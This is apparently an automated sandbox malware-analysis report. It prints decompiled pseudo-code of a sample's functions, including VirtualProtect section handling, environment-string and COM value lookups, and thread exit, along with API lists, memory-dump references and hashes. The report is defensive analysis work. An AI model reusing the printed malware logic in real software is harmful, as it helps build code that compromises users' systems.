                                                                                                                                                                                                                                    0x02f98576
                                                                                                                                                                                                                                    0x02f98585
                                                                                                                                                                                                                                    0x02f98587
                                                                                                                                                                                                                                    0x02f9858e
                                                                                                                                                                                                                                    0x02f985c2
                                                                                                                                                                                                                                    0x02f985c7
                                                                                                                                                                                                                                    0x02f985c9
                                                                                                                                                                                                                                    0x02f985cb
                                                                                                                                                                                                                                    0x02f985cb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f985c9
                                                                                                                                                                                                                                    0x02f98590
                                                                                                                                                                                                                                    0x02f98595
                                                                                                                                                                                                                                    0x02f985a3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f985a3
                                                                                                                                                                                                                                    0x02f9855d
                                                                                                                                                                                                                                    0x02f98562
                                                                                                                                                                                                                                    0x02f98562
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f98562
                                                                                                                                                                                                                                    0x02f98530
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9853f
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800,76D7F710), ref: 02F98528
                                                                                                                                                                                                                                      • Part of subcall function 02F98B94: GetTickCount.KERNEL32 ref: 02F98BA8
                                                                                                                                                                                                                                      • Part of subcall function 02F98B94: wsprintfA.USER32 ref: 02F98BF8
                                                                                                                                                                                                                                      • Part of subcall function 02F98B94: wsprintfA.USER32 ref: 02F98C15
                                                                                                                                                                                                                                      • Part of subcall function 02F98B94: wsprintfA.USER32 ref: 02F98C41
                                                                                                                                                                                                                                      • Part of subcall function 02F98B94: HeapFree.KERNEL32(00000000,?), ref: 02F98C53
                                                                                                                                                                                                                                      • Part of subcall function 02F98B94: wsprintfA.USER32 ref: 02F98C74
                                                                                                                                                                                                                                      • Part of subcall function 02F98B94: HeapFree.KERNEL32(00000000,?), ref: 02F98C84
                                                                                                                                                                                                                                      • Part of subcall function 02F98B94: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02F98CB2
                                                                                                                                                                                                                                      • Part of subcall function 02F98B94: GetTickCount.KERNEL32 ref: 02F98CC3
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800,76D7F710), ref: 02F98546
                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000002,02F9685F,?,02F9685F,00000002,?,?,02F92417,?), ref: 02F985A3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1676223858-0
                                                                                                                                                                                                                                    • Opcode ID: fb2eb30dcb104ce9b655f59bfcd00222c12f4cd695b22f939625a855e2b862da
                                                                                                                                                                                                                                    • Instruction ID: e191556fc94ac350fd8d8e3f583b2788e918a9eae884456540a8cea9934b3e34
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb2eb30dcb104ce9b655f59bfcd00222c12f4cd695b22f939625a855e2b862da
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE216D76A40208EBEF019F55DC80E9A77ADEB8A7D4F100426FA01DB250DB70E954CFA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00401179, Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E00401179(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x40414c;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}












                                                                                                                                                                                                                                    0x00401183
                                                                                                                                                                                                                                    0x00401190
                                                                                                                                                                                                                                    0x00401196
                                                                                                                                                                                                                                    0x004011a2
                                                                                                                                                                                                                                    0x004011b2
                                                                                                                                                                                                                                    0x004011b4
                                                                                                                                                                                                                                    0x004011bc
                                                                                                                                                                                                                                    0x00401251
                                                                                                                                                                                                                                    0x00401258
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004011c2
                                                                                                                                                                                                                                    0x004011c2
                                                                                                                                                                                                                                    0x004011c2
                                                                                                                                                                                                                                    0x004011c6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004011d2
                                                                                                                                                                                                                                    0x004011d6
                                                                                                                                                                                                                                    0x004011fa
                                                                                                                                                                                                                                    0x004011fe
                                                                                                                                                                                                                                    0x00401212
                                                                                                                                                                                                                                    0x00401212
                                                                                                                                                                                                                                    0x00401218
                                                                                                                                                                                                                                    0x00401227
                                                                                                                                                                                                                                    0x0040122b
                                                                                                                                                                                                                                    0x00401233
                                                                                                                                                                                                                                    0x00401233
                                                                                                                                                                                                                                    0x0040123b
                                                                                                                                                                                                                                    0x0040123e
                                                                                                                                                                                                                                    0x0040124b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040124b
                                                                                                                                                                                                                                    0x00401206
                                                                                                                                                                                                                                    0x0040120a
                                                                                                                                                                                                                                    0x00401210
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401210
                                                                                                                                                                                                                                    0x004011de
                                                                                                                                                                                                                                    0x004011e2
                                                                                                                                                                                                                                    0x004011ec
                                                                                                                                                                                                                                    0x004011e4
                                                                                                                                                                                                                                    0x004011e4
                                                                                                                                                                                                                                    0x004011e4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004011e2
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 004011B2
                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401227
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040122D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ProtectVirtual$ErrorLast
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1469625949-0
                                                                                                                                                                                                                                    • Opcode ID: 8bb0aca2ff9882565cae59be436ace9633660c54e8d7f472d76362242ea637b4
                                                                                                                                                                                                                                    • Instruction ID: e0497764a4c06b5612b956a562527d162aa7cc70331ed511b9c3235716ceee51
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bb0aca2ff9882565cae59be436ace9633660c54e8d7f472d76362242ea637b4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21217131801206EFCB14DF95C985AAAF7F5FF58319F0048AED102B7594E37CA695CB98
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F93DD9, Relevance: 3.9, APIs: 3, Instructions: 155stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                                                                                    			E02F93DD9(void* __eflags, int _a4) {
				intOrPtr _v12;
				WCHAR* _v16;
				char* _v20;
				int _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v88;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t80;
				WCHAR* _t85;

				_v88 = 0;
				memset( &_v84, 0, 0x2c);
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x2f9d27c; // 0x44a5a8
				_t5 = _t40 + 0x2f9ee40; // 0x410025
				_t85 = E02F96A12(_t5);
				_v16 = _t85;
				if(_t85 == 0) {
					_t80 = 8;
					L24:
					return _t80;
				}
				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
				if(_t45 != 0) {
					_t80 = 1;
					L22:
					E02F99039(_v16);
					goto L24;
				}
				if(E02F9A72D(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t50 = E02F9809F(0,  *0x2f9d33c);
				_v12 = _t50;
				if(_t50 == 0) {
					_t80 = 8;
					goto L19;
				} else {
					_t52 =  *0x2f9d27c; // 0x44a5a8
					_t11 = _t52 + 0x2f9e81a; // 0x65696c43
					_t55 = E02F9809F(0, _t11);
					_t87 = _t55;
					if(_t55 == 0) {
						_t80 = 8;
					} else {
						_t80 = E02F96BFA(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
						E02F99039(_t87);
					}
					if(_t80 != 0) {
						L17:
						E02F99039(_v12);
						L19:
						_t86 = _a4;
						if(_a4 != 0) {
							E02F91F99(_t86);
						}
						goto L22;
					} else {
						if(( *0x2f9d260 & 0x00000001) == 0) {
							L14:
							E02F98F83(_t80, _v88, _v84,  *0x2f9d270, 0);
							_t80 = E02F91C74(_v88,  &_v80,  &_v76, 0);
							if(_t80 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t80 = E02F942EA( &_v40, 0);
							}
							E02F99039(_v88);
							goto L17;
						}
						_t67 =  *0x2f9d27c; // 0x44a5a8
						_t18 = _t67 + 0x2f9e823; // 0x65696c43
						_t70 = E02F9809F(0, _t18);
						_t89 = _t70;
						if(_t70 == 0) {
							_t80 = 8;
						} else {
							_t80 = E02F96BFA(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
							E02F99039(_t89);
						}
						if(_t80 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}


























                                                                                                                                                                                                                                    0x02f93deb
                                                                                                                                                                                                                                    0x02f93dee
                                                                                                                                                                                                                                    0x02f93df5
                                                                                                                                                                                                                                    0x02f93dfb
                                                                                                                                                                                                                                    0x02f93dfc
                                                                                                                                                                                                                                    0x02f93dfd
                                                                                                                                                                                                                                    0x02f93dfe
                                                                                                                                                                                                                                    0x02f93dff
                                                                                                                                                                                                                                    0x02f93e00
                                                                                                                                                                                                                                    0x02f93e08
                                                                                                                                                                                                                                    0x02f93e14
                                                                                                                                                                                                                                    0x02f93e18
                                                                                                                                                                                                                                    0x02f93e1b
                                                                                                                                                                                                                                    0x02f93f6b
                                                                                                                                                                                                                                    0x02f93f6e
                                                                                                                                                                                                                                    0x02f93f72
                                                                                                                                                                                                                                    0x02f93f72
                                                                                                                                                                                                                                    0x02f93e2d
                                                                                                                                                                                                                                    0x02f93e35
                                                                                                                                                                                                                                    0x02f93f5e
                                                                                                                                                                                                                                    0x02f93f5f
                                                                                                                                                                                                                                    0x02f93f62
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f93f62
                                                                                                                                                                                                                                    0x02f93e47
                                                                                                                                                                                                                                    0x02f93e49
                                                                                                                                                                                                                                    0x02f93e49
                                                                                                                                                                                                                                    0x02f93e54
                                                                                                                                                                                                                                    0x02f93e5b
                                                                                                                                                                                                                                    0x02f93e5e
                                                                                                                                                                                                                                    0x02f93f4d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f93e64
                                                                                                                                                                                                                                    0x02f93e64
                                                                                                                                                                                                                                    0x02f93e69
                                                                                                                                                                                                                                    0x02f93e72
                                                                                                                                                                                                                                    0x02f93e77
                                                                                                                                                                                                                                    0x02f93e80
                                                                                                                                                                                                                                    0x02f93ea3
                                                                                                                                                                                                                                    0x02f93e82
                                                                                                                                                                                                                                    0x02f93e98
                                                                                                                                                                                                                                    0x02f93e9a
                                                                                                                                                                                                                                    0x02f93e9a
                                                                                                                                                                                                                                    0x02f93ea6
                                                                                                                                                                                                                                    0x02f93f41
                                                                                                                                                                                                                                    0x02f93f44
                                                                                                                                                                                                                                    0x02f93f4e
                                                                                                                                                                                                                                    0x02f93f4e
                                                                                                                                                                                                                                    0x02f93f53
                                                                                                                                                                                                                                    0x02f93f55
                                                                                                                                                                                                                                    0x02f93f55
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f93eac
                                                                                                                                                                                                                                    0x02f93eb3
                                                                                                                                                                                                                                    0x02f93ef4
                                                                                                                                                                                                                                    0x02f93f05
                                                                                                                                                                                                                                    0x02f93f1b
                                                                                                                                                                                                                                    0x02f93f1f
                                                                                                                                                                                                                                    0x02f93f24
                                                                                                                                                                                                                                    0x02f93f2a
                                                                                                                                                                                                                                    0x02f93f37
                                                                                                                                                                                                                                    0x02f93f37
                                                                                                                                                                                                                                    0x02f93f3c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f93f3c
                                                                                                                                                                                                                                    0x02f93eb5
                                                                                                                                                                                                                                    0x02f93eba
                                                                                                                                                                                                                                    0x02f93ec3
                                                                                                                                                                                                                                    0x02f93ec8
                                                                                                                                                                                                                                    0x02f93ecc
                                                                                                                                                                                                                                    0x02f93eef
                                                                                                                                                                                                                                    0x02f93ece
                                                                                                                                                                                                                                    0x02f93ee4
                                                                                                                                                                                                                                    0x02f93ee6
                                                                                                                                                                                                                                    0x02f93ee6
                                                                                                                                                                                                                                    0x02f93ef2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f93ef2
                                                                                                                                                                                                                                    0x02f93ea6

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.NTDLL ref: 02F93DEE
                                                                                                                                                                                                                                      • Part of subcall function 02F96A12: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,02F93E14,00410025,00000005,?,00000000), ref: 02F96A23
                                                                                                                                                                                                                                      • Part of subcall function 02F96A12: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 02F96A40
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02F93E22
                                                                                                                                                                                                                                    • StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 02F93E2D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3817122888-0
                                                                                                                                                                                                                                    • Opcode ID: 8e5b32264900f00441589d188e4d2fdbb06a25a0fa2f89d33c9589cef0c3c242
                                                                                                                                                                                                                                    • Instruction ID: 8442e22571d97997f595fb67d0f412a12c223f3e569d054f55dacb4bba281565
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e5b32264900f00441589d188e4d2fdbb06a25a0fa2f89d33c9589cef0c3c242
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9414E72E0121CABEF11EFE4CC84EEEBBBDAF087C4B114566E605E7110D7719A488B90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F99152, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E02F99152(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E02F93AEF(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x2f9d27c; // 0x44a5a8
						_t20 = _t68 + 0x2f9e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E02F97C14(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                                                                                                                                                                                                    0x02f99158
                                                                                                                                                                                                                                    0x02f9915b
                                                                                                                                                                                                                                    0x02f9916b
                                                                                                                                                                                                                                    0x02f99174
                                                                                                                                                                                                                                    0x02f99178
                                                                                                                                                                                                                                    0x02f99246
                                                                                                                                                                                                                                    0x02f9924c
                                                                                                                                                                                                                                    0x02f9924c
                                                                                                                                                                                                                                    0x02f99192
                                                                                                                                                                                                                                    0x02f99197
                                                                                                                                                                                                                                    0x02f9919b
                                                                                                                                                                                                                                    0x02f991a1
                                                                                                                                                                                                                                    0x02f991a6
                                                                                                                                                                                                                                    0x02f991ad
                                                                                                                                                                                                                                    0x02f991bc
                                                                                                                                                                                                                                    0x02f991bc
                                                                                                                                                                                                                                    0x02f991c0
                                                                                                                                                                                                                                    0x02f991c2
                                                                                                                                                                                                                                    0x02f991ce
                                                                                                                                                                                                                                    0x02f991d9
                                                                                                                                                                                                                                    0x02f991e4
                                                                                                                                                                                                                                    0x02f991e8
                                                                                                                                                                                                                                    0x02f991f2
                                                                                                                                                                                                                                    0x02f991f6
                                                                                                                                                                                                                                    0x02f991f8
                                                                                                                                                                                                                                    0x02f991fd
                                                                                                                                                                                                                                    0x02f99204
                                                                                                                                                                                                                                    0x02f99214
                                                                                                                                                                                                                                    0x02f99214
                                                                                                                                                                                                                                    0x02f991fd
                                                                                                                                                                                                                                    0x02f991f6
                                                                                                                                                                                                                                    0x02f99216
                                                                                                                                                                                                                                    0x02f9921b
                                                                                                                                                                                                                                    0x02f99220
                                                                                                                                                                                                                                    0x02f99220
                                                                                                                                                                                                                                    0x02f99226
                                                                                                                                                                                                                                    0x02f9922c
                                                                                                                                                                                                                                    0x02f99231
                                                                                                                                                                                                                                    0x02f99231
                                                                                                                                                                                                                                    0x02f99236
                                                                                                                                                                                                                                    0x02f9923b
                                                                                                                                                                                                                                    0x02f9923b
                                                                                                                                                                                                                                    0x02f99236
                                                                                                                                                                                                                                    0x02f991c0
                                                                                                                                                                                                                                    0x02f9923d
                                                                                                                                                                                                                                    0x02f99243
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 02F93AEF: SysAllocString.OLEAUT32(80000002), ref: 02F93B46
                                                                                                                                                                                                                                      • Part of subcall function 02F93AEF: SysFreeString.OLEAUT32(00000000), ref: 02F93BAB
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 02F99231
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(02F91885), ref: 02F9923B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$Free$Alloc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 986138563-0
                                                                                                                                                                                                                                    • Opcode ID: e80404c66a1aa7334208d7c091e48d878076b0c8ef660a04f88fd41bd089dde6
                                                                                                                                                                                                                                    • Instruction ID: a85a96a669b2414ca223ff9ecb385fae983b4ad11a6c543a308669886ca9d96d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e80404c66a1aa7334208d7c091e48d878076b0c8ef660a04f88fd41bd089dde6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1315A72900118AFDF21EFA5CC88C9BBB7AFFC97847114698F9159B210E3719D91CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040135A, Relevance: 3.1, APIs: 2, Instructions: 59stringthreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E0040135A() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x404150;
				if( *0x40412c > 5) {
					_t16 = _t15 + 0x4050f9;
				} else {
					_t16 = _t15 + 0x4050b1;
				}
				E00401FE7(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E00401414( &_v32,  &_v16,  *0x40414c ^ 0xfd7cd1cf) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x404138);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E0040102F(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x404138 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E0040200D(_t44, _t32 + 4);
						}
					}
					_t25 = E00401E11(_v28); // executed
				}
				ExitThread(_t25);
			}















                                                                                                                                                                                                                                    0x00401360
                                                                                                                                                                                                                                    0x00401371
                                                                                                                                                                                                                                    0x0040137b
                                                                                                                                                                                                                                    0x00401373
                                                                                                                                                                                                                                    0x00401373
                                                                                                                                                                                                                                    0x00401373
                                                                                                                                                                                                                                    0x00401382
                                                                                                                                                                                                                                    0x0040138b
                                                                                                                                                                                                                                    0x00401390
                                                                                                                                                                                                                                    0x004013ae
                                                                                                                                                                                                                                    0x00401405
                                                                                                                                                                                                                                    0x004013b0
                                                                                                                                                                                                                                    0x004013b6
                                                                                                                                                                                                                                    0x004013bc
                                                                                                                                                                                                                                    0x004013ca
                                                                                                                                                                                                                                    0x004013ce
                                                                                                                                                                                                                                    0x004013d5
                                                                                                                                                                                                                                    0x004013d7
                                                                                                                                                                                                                                    0x004013e3
                                                                                                                                                                                                                                    0x004013e5
                                                                                                                                                                                                                                    0x004013f4
                                                                                                                                                                                                                                    0x004013e7
                                                                                                                                                                                                                                    0x004013ed
                                                                                                                                                                                                                                    0x004013ed
                                                                                                                                                                                                                                    0x004013e5
                                                                                                                                                                                                                                    0x004013fc
                                                                                                                                                                                                                                    0x004013fc
                                                                                                                                                                                                                                    0x00401407

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExitThreadlstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2636182767-0
                                                                                                                                                                                                                                    • Opcode ID: d0f5276c7d2ce7e0a5e41471ba7a2c6755e937518a4a13e4d3d01d1591e5aeb6
                                                                                                                                                                                                                                    • Instruction ID: 89559214658415b618ba5696c5fb43bb06a1630c8a8f3c3b56ffde9c1baf62f0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0f5276c7d2ce7e0a5e41471ba7a2c6755e937518a4a13e4d3d01d1591e5aeb6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C711BB71408205AFE711EBA5CD48D9B77ECEB48304F01083AB645FB1B1E734E5458B9A
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F954BC, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 37%
